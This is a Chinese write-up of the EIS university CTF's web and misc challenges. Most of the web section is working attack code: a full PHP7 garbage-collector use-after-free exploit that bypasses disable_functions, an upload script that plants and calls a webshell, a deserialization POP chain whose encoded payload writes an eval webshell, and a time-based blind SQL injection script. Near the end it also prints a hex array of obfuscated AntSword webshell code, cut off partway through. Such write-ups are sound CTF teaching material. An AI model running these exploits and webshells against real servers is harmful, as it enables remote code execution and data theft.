web安全,ctf

EIS高校运维赛WP

WEB

ezbypass

http://111.186.57.61:10101/

<?php
if(isset($_GET['src']))
{
    highlight_file(__FILE__);
}

eval($_GET['cmd']);

很明显eval命令执行,但是不可能这么容易,看了下phpinfo,果然ban了很多函数

disable_functions : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,mail,mb_send_mail,putenv,error_log,apache_setenv

这里想起PHP绕过disable_function限制得方法,又看到别人传得ant_x64.so,百度可看到关于蚁剑绕过限制函数得插件

在这里插入图片描述

因为它这里直接可以连蚁剑,而蚁剑正好有个bypass得插件,极方便。参见https://github.com/Medicean/as_bypass_php_disable_functions

在这里插入图片描述
连上启动插件,这里我们找一个没被禁用得方法即可
在这里插入图片描述
ban了error_log,mail,putenv等,常规的bypass disable_functions是行不通得,也可以通过如下方法bypass。
参考: https://github.com/mm0r1/exploits/tree/master/php7-gc-bypass
脚本:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import base64

exp = """
<?php
    pwn($_REQUEST['shell']); 
    //pwn('/readflag');
    function pwn($cmd) {
        global $abc, $helper;
        function str2ptr(&$str, $p = 0, $s = 8) {
            $address = 0;
            for($j = $s-1; $j >= 0; $j--) {
                $address <<= 8;
                $address |= ord($str[$p+$j]);
            }
            return $address;
        }
        function ptr2str($ptr, $m = 8) {
            $out = "";
            for ($i=0; $i < $m; $i++) {
                $out .= chr($ptr & 0xff);
                $ptr >>= 8;
            }
            return $out;
        }
        function write(&$str, $p, $v, $n = 8) {
            $i = 0;
            for($i = 0; $i < $n; $i++) {
                $str[$p + $i] = chr($v & 0xff);
                $v >>= 8;
            }
        }
        function leak($addr, $p = 0, $s = 8) {
            global $abc, $helper;
            write($abc, 0x68, $addr + $p - 0x10);
            $leak = strlen($helper->a);
            if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
            return $leak;
        }
        function parse_elf($base) {
            $e_type = leak($base, 0x10, 2);
            $e_phoff = leak($base, 0x20);
            $e_phentsize = leak($base, 0x36, 2);
            $e_phnum = leak($base, 0x38, 2);
            for($i = 0; $i < $e_phnum; $i++) {
                $header = $base + $e_phoff + $i * $e_phentsize;
                $p_type  = leak($header, 0, 4);
                $p_flags = leak($header, 4, 4);
                $p_vaddr = leak($header, 0x10);
                $p_memsz = leak($header, 0x28);
                if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
                    # handle pie
                    $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                    $data_size = $p_memsz;
                } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
                    $text_size = $p_memsz;
                }
            }
            if(!$data_addr || !$text_size || !$data_size)
                return false;
            return [$data_addr, $text_size, $data_size];
        }
        function get_basic_funcs($base, $elf) {
            list($data_addr, $text_size, $data_size) = $elf;
            for($i = 0; $i < $data_size / 8; $i++) {
                $leak = leak($data_addr, $i * 8);
                if($leak - $base > 0 && $leak - $base < $text_size) {
                    $deref = leak($leak);
                    # 'constant' constant check
                    if($deref != 0x746e6174736e6f63)
                        continue;
                } else continue;
                $leak = leak($data_addr, ($i + 4) * 8);
                if($leak - $base > 0 && $leak - $base < $text_size) {
                    $deref = leak($leak);
                    # 'bin2hex' constant check
                    if($deref != 0x786568326e6962)
                        continue;
                } else continue;
                return $data_addr + $i * 8;
            }
        }
        function get_binary_base($binary_leak) {
            $base = 0;
            $start = $binary_leak & 0xfffffffffffff000;
            for($i = 0; $i < 0x1000; $i++) {
                $addr = $start - 0x1000 * $i;
                $leak = leak($addr, 0, 7);
                if($leak == 0x10102464c457f) { # ELF header
                    return $addr;
                }
            }
        }
        function get_system($basic_funcs) {
            $addr = $basic_funcs;
            do {
                $f_entry = leak($addr);
                $f_name = leak($f_entry, 0, 6);
                if($f_name == 0x6d6574737973) { # system
                    return leak($addr + 8);
                }
                $addr += 0x20;
            } while($f_entry != 0);
            return false;
        }
        class ryat {
            var $ryat;
            var $chtg;
            function __destruct()
            {
                $this->chtg = $this->ryat;
                $this->ryat = 1;
            }
        }
        class Helper {
            public $a, $b, $c, $d;
        }
        if(stristr(PHP_OS, 'WIN')) {
            die('This PoC is for *nix systems only.');
        }
        $n_alloc = 10; # increase this value if you get segfaults
        $contiguous = [];
        for($i = 0; $i < $n_alloc; $i++)
            $contiguous[] = str_repeat('A', 79);
        $poc = 'a:4:{i:0;i:1;i:1;a:1:{i:0;O:4:"ryat":2:{s:4:"ryat";R:3;s:4:"chtg";i:2;}}i:1;i:3;i:2;R:5;}';
        $out = unserialize($poc);
        gc_collect_cycles();
        $v = [];
        $v[0] = ptr2str(0, 79);
        unset($v);
        $abc = $out[2][0];
        $helper = new Helper;
        $helper->b = function ($x) { };
        if(strlen($abc) == 79 || strlen($abc) == 0) {
            die("UAF failed");
        }
        # leaks
        $closure_handlers = str2ptr($abc, 0);
        $php_heap = str2ptr($abc, 0x58);
        $abc_addr = $php_heap - 0xc8;
        # fake value
        write($abc, 0x60, 2);
        write($abc, 0x70, 6);
        # fake reference
        write($abc, 0x10, $abc_addr + 0x60);
        write($abc, 0x18, 0xa);
        $closure_obj = str2ptr($abc, 0x20);
        $binary_leak = leak($closure_handlers, 8);
        if(!($base = get_binary_base($binary_leak))) {
            die("Couldn't determine binary base address");
        }
        if(!($elf = parse_elf($base))) {
            die("Couldn't parse ELF header");
        }
        if(!($basic_funcs = get_basic_funcs($base, $elf))) {
            die("Couldn't get basic_functions address");
        }
        if(!($zif_system = get_system($basic_funcs))) {
            die("Couldn't get zif_system address");
        }
        # fake closure object
        $fake_obj_offset = 0xd0;
        for($i = 0; $i < 0x110; $i += 8) {
            write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
        }
        # pwn
        write($abc, 0x20, $abc_addr + $fake_obj_offset);
        write($abc, 0xd0 + 0x38, 1, 4); # internal func type
        write($abc, 0xd0 + 0x68, $zif_system); # internal func handler
        ($helper->b)($cmd);
        exit();
    }
    ?>
"""


url = "http://111.186.57.61:10101/?"

def upload():
    r = requests.post(
        url + "cmd=file_put_contents('/tmp/.berl1n.php',base64_decode($_POST['aa']));",
        data={"aa": base64.b64encode(exp.encode('utf-8'))})

def system(cmd):
    r = requests.get(url+'cmd?=', params={"cmd": "include('/tmp/.berl1n.php');", "shell": cmd})
    return r.text

if __name__ == '__main__':    
    upload()
    # system("ls /")
    flag = 'flag: ' + system('/readflag')
    print(flag)

在这里插入图片描述

ezupload

http://111.186.57.61:10501/
题目一个登录页面,没有注册接口,猜测注入,不过怎么也进不去,查了源码发现.login.php.swp泄露,恢复后

<?php
#error_reporting(0);
session_start();
include "config.php";

$username = $_POST['username'];
$password = $_POST['password'];
if (isset($username)){
    $sql = "select password from user where name=?";
    if ($stmt = $mysqli->prepare($sql)) {
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($dpasswd);
        $stmt->fetch();
        if ($dpasswd === $password){
        $_SESSION['login'] = 1;
            header("Location: /upload.php");
        }else{
            die("login failed");
        }
        $stmt->close();
    }
}else{
    header("Location: /index.php");
}

$mysqli->close();

漏洞出在password处,当$_POST['password']不存在的时候,$password会被赋值为null。同样的,当sql语句查询结果为空时,返回为null,$dpasswd就会被赋值为null,绕过登录成功
post请求中随便写usrname,不提交password值即可登陆。
在这里插入图片描述
返回302成功登录,这时再打开upload.php
在这里插入图片描述
可以上传文件,文件检测php,但可以用phtml、php3、php5、php7等形式绕过,同时检测文件内容只检测头,改为GIF89a图片头,就可以上传了。
上传会返回一个数组,脚本可以回显出来,抓包没回显
在这里插入图片描述
抓包上传结果

在这里插入图片描述
原来以为临时文件夹可以访问得结果不可以,试了下upload发现也不行,扫了一下没扫出来目录,MD上传上去了不知道在哪,,,,最后发现在uploads下,,,不仔细。

在这里插入图片描述
上传成功
连接蚁剑,
在这里插入图片描述
脚本

import requests
import time

#upload file
#
session = requests.session()
timeout = time.sleep(1)
url = 'http://111.186.57.123:10501'
data = {'username': "1'or%201='1#"}

# cookies = {'SL_G_WPT_TO':'zh', 'SL_GWPT_Show_Hide_tmp':'1', 'SL_wptGlobTipTmp':'1', 'login':'1' , 'PHPSESSID':'69ad892324f39fb1015b503ef0258d89'}

index = session.post(url=url+'/login.php',data=data)
# print(index.text)

upload = session.post(url=url+'/upload.php',files={"avatar":("berl1n.phtml", open("MUMA.jpg", "rb"))}).text
print(upload)

# file = session.get(url+'/uploads/berl1n.phtml').text
# print(file)

flag = session.post(url+'/uploads/berl1n.phtml',data={'MUMA':"system('/readflag');"}).text
print(flag)

在这里插入图片描述

ezjava

http://111.186.57.43:10301/ezjava/
题目提供源码,下载以后解压,class反编译,代码很简单,猜测问题出在依赖库。

调用了fastjson-1.2.47。
护网时候爆出来的漏洞, fastjson =< 1.2.47 反序列化。
参考: https://github.com/CaijiOrz/fastjson-1.2.47-RCE
参考 https://yaofeifly.github.io/2019/07/28/fastjson/
fastjson-1.2.47在线复现
vps开个端口接受下弹过来的shell
ezjava: flag{jndi_injection_by_ldap_3232}

ezpop

http://111.186.57.123:10401/?src=
源码:

<?php
error_reporting(0);

class A{

    protected $store;  //保护变量

    protected $key;

    protected $expire;

    public function __construct($store, $key = 'flysystem', $expire = null)
    {
        $this->key    = $key;
        $this->store  = $store;
        $this->expire = $expire;
    }

    public function cleanContents(array $contents)  //cleanContents函数,传数组
    {
        $cachedProperties = array_flip([                  //键值对交换
            'path', 'dirname', 'basename', 'extension', 'filename',
            'size', 'mimetype', 'visibility', 'timestamp', 'type',
        ]);

        foreach ($contents as $path => $object) { //遍历数组contents,若object是数组,比较两个数组键名返回交集
            if (is_array($object)) {
                $contents[$path] = array_intersect_key($object, $cachedProperties);
            }
        }

        return $contents;
    }

    public function getForStorage()
    {
        $cleaned = $this->cleanContents($this->cache);

        return json_encode([$cleaned, $this->complete]);
    }

    public function save()
    {
        $contents = $this->getForStorage();

        $this->store->set($this->key, $contents, $this->expire);
    }

    public function __destruct()
    {
        if (! $this->autosave) {
            $this->save();
        }
    }
}

class B{

    protected function getExpireTime($expire): int
    {
        return (int) $expire;
    }

    public function getCacheKey(string $name): string
    {
        return $this->options['prefix'] . $name;
    }

    protected function serialize($data): string
    {
        if (is_numeric($data)) {
            return (string) $data;
        }

        $serialize = $this->options['serialize'];

        return $serialize($data);
    }

    public function set($name, $value, $expire = null): bool
    {
        $this->writeTimes++;

        if (is_null($expire)) {
            $expire = $this->options['expire'];
        }

        $expire   = $this->getExpireTime($expire);
        $filename = $this->getCacheKey($name);

        $dir = dirname($filename);

        if (!is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\Exception $e) {
                // 创建失败
            }
        }

        $data = $this->serialize($value);

        if ($this->options['data_compress'] && function_exists('gzcompress')) {
            //数据压缩
            $data = gzcompress($data, 3);
        }

        $data   = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
        $result = file_put_contents($filename, $data);

        if ($result) {
            return true;
        }

        return false;
    }

}

if (isset($_GET['src']))
{
    highlight_file(__FILE__);
}

$dir = "uploads/";

if (!is_dir($dir))
{
    mkdir($dir);
}
unserialize($_GET["data"]);

反序列化,构造pop链即可。
A存在__destruct方法,所以肯定是反序列化A。当A::autosave==false成立时,调用A::save()
A::save()中调用了A::store->set(),将A::store赋值为一个B对象,即可调用B::set()

B::set()可以写入文件,且文件名(以及路径)和文件内容后半部分可控。文件内容前半部分中,存在一个exit(),会导致写入的webshell无法执行。
利用base64_decode以及php://filter可以绕过。
参照ph牛的blog:谈一谈php://filter的妙用

php中的base64_decode函数会将不合法字符全部舍弃, 将合法字符组成一个新的字符串进行解码,利用这一点即可达到bypass的目的。
通过php://filter/write=convert.base64-decode将文件内容解码后写入,bypass exit。

然后回溯看看$filename$data是怎么处理的。

$filename
80行调用B::getCacheKey($name),在B::getCacheKey($name)中拼接字符串$this->options['prefix'].$name构成filename

$data:
99行拼接前半部分,通过上面的方法bypass。
94行的分支可以不进入,92行调用B::serialize($value),$valueB::set($name, $value, $expire = null)的参数。
B::serialize($value)调用B::options['serialize']()处理了$value
再看$value
$value实际是A::getForStorage()的返回值。A::getForStorage()返回json_encode([A::cleanContents(A::cache), A::complete]);。
A::cleanContents(A::cache)实现了一个过滤的功能,A::complete更容易控制,直接写为shellcode。
由于$value是一个json字符串,然后,json字符串的字符均不是base64合法字符,通过base64_decode可以直接从json中提取出shellcode。
所以将shellcode经过base64编码,B::options['serialize']赋值为base64_decode。

poc:

<?php
/*
.........
*/
class A{

    protected $store;  

    protected $key;

    protected $expire;
    public function __construct($store, $key = 'flysystem', $expire = null)
    {
        $this->key    = $key;
        $this->store  = $store;
        $this->expire = $expire;
    }
}
class B{

    protected function getExpireTime($expire): int
    {
        return (int) $expire;
    }

    public function getCacheKey(string $name): string
    {
        return $this->options['prefix'] . $name;
    }

    protected function serialize($data): string
    {
        if (is_numeric($data)) {
            return (string) $data;
        }

        $serialize = $this->options['serialize'];

        return $serialize($data);
    }

    public function set($name, $value, $expire = null): bool
    {
        $this->writeTimes++;

        if (is_null($expire)) {
            $expire = $this->options['expire'];
        }

        $expire   = $this->getExpireTime($expire);
        $filename = $this->getCacheKey($name);

        $dir = dirname($filename);

        if (!is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\Exception $e) {
                // 创建失败
            }
        }

        $data = $this->serialize($value);

        if ($this->options['data_compress'] && function_exists('gzcompress')) {
            //数据压缩
            $data = gzcompress($data, 3);
        }

        $data   = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
        $result = file_put_contents($filename, $data);

        if ($result) {
            return true;
        }

        return false;
    }

}

$b = new B();
$b->options = array('serialize' => "base64_decode", 'data_compress' => false);
$b->options['prefix'] = "php://filter/write=convert.base64-decode/resource=uploads/1";
$b->writeTimes = 0;

$a = new A($store = $b, $key = ".php", $expire = 0);
$a->autosave = false;
$a->cache = array();
//base64要补齐字节数
$a->complete = base64_encode("qaq" . base64_encode('<?php @eval($_POST["muma"]);?>'));

echo urlencode(serialize($a));

payload:

http://111.186.57.123:10401/?data=O%3A1%3A%22A%22%3A6%3A%7Bs%3A8%3A%22%00%2A%00store%22%3BO%3A1%3A%22B%22%3A2%3A%7Bs%3A7%3A%22options%22%3Ba%3A3%3A%7Bs%3A9%3A%22serialize%22%3Bs%3A13%3A%22base64_decode%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A59%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dconvert.base64-decode%2Fresource%3Duploads%2F1%22%3B%7Ds%3A10%3A%22writeTimes%22%3Bi%3A0%3B%7Ds%3A6%3A%22%00%2A%00key%22%3Bs%3A4%3A%22.php%22%3Bs%3A9%3A%22%00%2A%00expire%22%3Bi%3A0%3Bs%3A8%3A%22autosave%22%3Bb%3A0%3Bs%3A5%3A%22cache%22%3Ba%3A0%3A%7B%7Ds%3A8%3A%22complete%22%3Bs%3A60%3A%22cWFxUEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VV3lKdGRXMWhJbDBwT3o4Kw%3D%3D%22%3B%7D

在这里插入图片描述
创建成功,getshell读flag即可

ezwaf

http://111.186.57.61:10601/?src

<?php
include "config.php";

if (isset($_GET['src']))
{
    highlight_file(__FILE__);
}

function escape($arr)
{
    global $mysqli;
    $newarr = array();
    foreach($arr as $key=>$val)
    {
        if (!is_array($val))
        {
            $newarr[$key] = mysqli_real_escape_string($mysqli, $val);
        }
    }
    return $newarr;
}

$_GET= escape($_GET);

if (isset($_GET['name']))
{
    $name = $_GET['name'];
    mysqli_query($mysqli, "select age from user where name='$name'");
}else if(isset($_GET['age']))
{
    $age = $_GET['age'];
    mysqli_query($mysqli, "select name from user where age=$age");
}

代码中加了一层mysql_real_escape_string()函数过滤了单引号双引号
但是在代码中我们可以发现,age这个变量是数值型注入。所以直接盲注就可以。盲注代码如下:

import requests
import urllib

flag = ''
pos = 1
url = 'http://111.186.57.61:10601/?age='
while True :
    for i in range(0,128):
        try:
           # res = requests.get(url+urllib.quote('-1 or if((ascii(substring((select group_concat(table_name) from information_schema.columns where table_schema=database()) from %d for 1))=%d),sleep(4),1)'%(pos,i)),headers={'Content-Length':''},timeout=2)
           # flag_xdd
           # res = requests.get(url+urllib.quote('-1 or if((ascii(substring((select group_concat(column_name) from information_schema.columns where table_name=0x666c61675f786464) from %d for 1))=%d),sleep(4),1)'%(pos,i)),headers={'Content-Length':''},timeout=2)
           # flag_32122
           res = requests.get(url+urllib.quote('-1 or if((ascii(substring((select group_concat(flag_32122) from flag_xdd ) from %d for 1))=%d),sleep(4),1)'%(pos,i)),headers={'Content-Length':''},timeout=2)
        except Exception ,e:
            flag +=chr(i)
            print flag
            break
    pos = pos+1
    print "oops"

因为过滤了引号,所以再写where子句的时候,用的是十六进制绕过。

ezcms

http://111.186.57.61:10201/guanfangxinwen/

https://blog.csdn.net/qq_23936389/article/details/84967434

misc

misc1

下载一个txt文件,打开后乱码,用hex打开后,编码ASCII切换为EBCDIC,尾部得到flag

在这里插入图片描述

misc2

#!/usr/bin/env python 
# -*- coding: utf-8 -*- 
import os 
from flask import request 
from flask import Flask 

secret = open('/flag', 'rb') 
os.remove('/flag') 
app = Flask(__name__) 
app.secret_key = '015b9efef8f51c00bcba57ca8c56d77a' 
@app.route('/') 
def index(): 
    return open(__file__).read() 
@app.route("/r", methods=['POST']) 
def r(): 
    data = request.form["data"]  #传参,如果该文件存在,打开并读取文件
    if os.path.exists(data): 
        return open(data).read()  
    return '' 

if __name__ == '__main__': 
    app.run(host='0.0.0.0', port=8000, debug=False)

因为读取flag会被删掉,利用读取文件描述符拿到flag
在这里插入图片描述

misc3

下载html文件,控制台中发现
在这里插入图片描述

&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&zwnj;&#8203;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&#8203;&zwnj;&#8203;&#8203;&#8203;&#8203;&zwnj;&#8203;&#8203;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&zwnj;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&zwnj;&#8203;&zwnj;&zwnj;&#8203;&#8203;&#8203;&zwnj;&zwnj;&#8203;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&#8203;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&#8203;&zwnj;&#8203;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&zwnj;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&#8203;&zwnj;&#8203;&zwnj;&zwnj;&#8203;&#8203;&#8203;&zwnj;&zwnj;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&#8203;&zwnj;&#8203;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&#8203;&zwnj;&zwnj;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&#8203;&zwnj;&zwnj;&#8203;&zwnj;&#8203;&#8203;&#8203;&#8203;&#8203;&zwnj;&#8203;

发现只有两种字符,01替换转文本

0110011001101100011000010110011101111011011001010011001001100001001110010110001100111000011000100011000100110001001101110011010101100101001101100011011001100011011001100011001000110001011001100011100000110101001110010011001101100010011000110011100000110101011000100110011000111001001100110011100101111101

在这里插入图片描述

webshell

下载下来是蚁见shell流量包,

在这里插入图片描述
可以看到char字符混淆,将字符保存下来,写个脚本还原一下

a=[0x40,0x69,0x6e,0x69,0x5f,0x73,0x65,0x74,0x28,0x22,0x64,0x69,0x73,0x70,0x6c,0x61,0x79,0x5f,0x65,0x72,0x72,0x6f,0x72,0x73,0x22,0x2c,0x20,0x22,0x30,0x22,0x29,0x3b,0x40,0x73,0x65,0x74,0x5f,0x74,0x69,0x6d,0x65,0x5f,0x6c,0x69,0x6d,0x69,0x74,0x28,0x30,0x29,0x3b,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x61,0x73,0x65,0x6e,0x63,0x28,0x24,0x6f,0x75,0x74,0x29,0x7b,0x40,0x73,0x65,0x73,0x73,0x69,0x6f,0x6e,0x5f,0x73,0x74,0x61,0x72,0x74,0x28,0x29,0x3b,0x24,0x6b,0x65,0x79,0x3d,0x27,0x66,0x35,0x30,0x34,0x35,0x62,0x30,0x35,0x61,0x62,0x65,0x36,0x65,0x63,0x39,0x62,0x31,0x65,0x33,0x37,0x66,0x61,0x66,0x61,0x38,0x35,0x31,0x66,0x35,0x64,0x65,0x39,0x27,0x3b,0x72,0x65,0x74,0x75,0x72,0x6e,0x20,0x40,0x62,0x61,0x73,0x65,0x36,0x34,0x5f,0x65,0x6e,0x63,0x6f,0x64,0x65,0x28,0x6f,0x70,0x65,0x6e,0x73,0x73,0x6c,0x5f,0x65,0x6e,0x63,0x72,0x79,0x70,0x74,0x28,0x62,0x61,0x73,0x65,0x36,0x34,0x5f,0x65,0x6e,0x63,0x6f,0x64,0x65,0x28,0x24,0x6f,0x75,0x74,0x29,0x2c,0x20,0x27,0x41,0x45,0x53,0x2d,0x31,0x32,0x38,0x2d,0x45,0x43,0x42,0x27,0x2c,0x20,0x24,0x6b,0x65,0x79,0x2c,0x20,0x4f,0x50,0x45,0x4e,0x53,0x53,0x4c,0x5f,0x52,0x41,0x57,0x5f,0x44,0x41,0x54,0x41,0x29,0x29,0x3b,0x7d,0x3b,0x3b,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x61,0x73,0x6f,0x75,0x74,0x70,0x75,0x74,0x28,0x29,0x7b,0x24,0x6f,0x75,0x74,0x70,0x75,0x74,0x3d,0x6f,0x62,0x5f,0x67,0x65,0x74,0x5f,0x63,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x73,0x28,0x29,0x3b,0x6f,0x62,0x5f,0x65,0x6e,0x64,0x5f,0x63,0x6c,0x65,0x61,0x6e,0x28,0x29,0x3b,0x65,0x63,0x68,0x6f,0x20,0x22,0x38,0x63,0x32,0x62,0x34,0x22,0x3b,0x65,0x63,0x68,0x6f,0x20,0x40,0x61,0x73,0x65,0x6e,0x63,0x28,0x24,0x6f,0x75,0x74,0x70,0x75,0x74,0x29,0x3b,0x65,0x63,0x68,0x6f,0x20,0x22,0x65,0x32,0x65,0x31,0x30,0x22,0x3b,0x7d,0x6f,0x62,0x5f,0x73,0x74,0x61,0x72,0x74,0x28,0x29,0x3b,0x74,0x72,0x79,0x7b,0x24,0x70,0x3d,0x62,0x61,0x73,0x65,0x36,0x34,0x5f,0x64,0x65,0x63,0x6f,0x64,0x65,0x28,0x24,0x5f,0x50,0x4f,0x53,0x54,0x5b,0x22,0x30,0x78,0x31,0x62,0x34,0x64,0x34,0x35,0x36,0x63,0x37,0x32,0x39,0x37,0x64,0x22,0x5d,0x29,0x3b,0x24,0x73,0x3d,0x62,0x61,0x73,0x65,0x36,0x34,0x5f,0x64,0x65,0x63,0x6f,0x64,0x65,0x28,0x24,0x5f,0x50,0x4f,0x53,0x54,0x5b,0x22,0x30,0x78,0x62,0x39,0x62,0x34,0x35,0x36,0x38,0x38,0x61,0x35,0x61,0x30,0x38,0x22,0x5d,0x29,0x3b,0x24,0x64,0x3d,0x64,0x69,0x72,0x6e,0x61,0x6d,0x65,0x28,0x24,0x5f,0x53,0x45,0x52,0x56,0x45,0x52,0x5b,0x22,0x53,0x43,0x52,0x49,0x50,0x54,0x5f,0x46,0x49,0x4c,0x45,0x4e,0x41,0x4d,0x45,0x22,0x5d,0x29,0x3b,0x24,0x63,0x3d,0x73,0x75,0x62,0x73,0x74,0x72,0x28,0x24,0x64,0x2c,0x30,0x2c,0x31,0x29,0x3d,0x3d,0x22,0x2f,0x22,0x3f,0x22,0x2d,0x63,0x20,0x5c,0x22,0x7b,0x24,0x73,0x7d,0x5c,0x22,0x22,0x3a,0x22,0x2f,0x63,0x20,0x5c,0x22,0x7b,0x24,0x73,0x7d,0x5c,0x22,0x22,0x3b,0x24,0x72,0x3d,0x22,0x7b,0x24,0x70,0x7d,0x20,0x7b,0x24,0x63,0x7d,0x22,0x3b,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x66,0x65,0x28,0x24,0x66,0x29,0x7b,0x24,0x64,0x3d,0x65,0x78,0x70,0x6c,0x6f,0x64,0x65,0x28,0x22,0x2c,0x22,0x2c,0x40,0x69,0x6e,0x69,0x5f,0x67,0x65,0x74,0x28,0x22,0x64,0x69,0x73,0x61,0x62,0x6c,0x65,0x5f,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x73,0x22,0x29,0x29,0x3b,0x69,0x66,0x28,0x65,0x6d,0x70,0x74,0x79,0x28,0x24,0x64,0x29,0x29,0x7b,0x24,0x64,0x3d,0x61,0x72,0x72,0x61,0x79,0x28,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x7b,0x24,0x64,0x3d,0x61,0x72,0x72,0x61,0x79,0x5f,0x6d,0x61,0x70,0x28,0x27,0x74,0x72,0x69,0x6d,0x27,0x2c,0x61,0x72,0x72,0x61,0x79,0x5f,0x6d,0x61,0x70,0x28,0x27,0x73,0x74,0x72,0x74,0x6f,0x6c,0x6f,0x77,0x65,0x72,0x27,0x2c,0x24,0x64,0x29,0x29,0x3b,0x7d,0x72,0x65,0x74,0x75,0x72,0x6e,0x28,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x5f,0x65,0x78,0x69,0x73,0x74,0x73,0x28,0x24,0x66,0x29,0x26,0x26,0x69,0x73,0x5f,0x63,0x61,0x6c,0x6c,0x61,0x62,0x6c,0x65,0x28,0x24,0x66,0x29,0x26,0x26,0x21,0x69,0x6e,0x5f,0x61,0x72,0x72,0x61,0x79,0x28,0x24,0x66,0x2c,0x24,0x64,0x29,0x29,0x3b,0x7d,0x3b,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x72,0x75,0x6e,0x63,0x6d,0x64,0x28,0x24,0x63,0x29,0x7b,0x24,0x72,0x65,0x74,0x3d,0x30,0x3b,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x73,0x79,0x73,0x74,0x65,0x6d,0x27,0x29,0x29,0x7b,0x40,0x73,0x79,0x73,0x74,0x65,0x6d,0x28,0x24,0x63,0x2c,0x24,0x72,0x65,0x74,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x70,0x61,0x73,0x73,0x74,0x68,0x72,0x75,0x27,0x29,0x29,0x7b,0x40,0x70,0x61,0x73,0x73,0x74,0x68,0x72,0x75,0x28,0x24,0x63,0x2c,0x24,0x72,0x65,0x74,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x73,0x68,0x65,0x6c,0x6c,0x5f,0x65,0x78,0x65,0x63,0x27,0x29,0x29,0x7b,0x70,0x72,0x69,0x6e,0x74,0x28,0x40,0x73,0x68,0x65,0x6c,0x6c,0x5f,0x65,0x78,0x65,0x63,0x28,0x24,0x63,0x29,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x65,0x78,0x65,0x63,0x27,0x29,0x29,0x7b,0x40,0x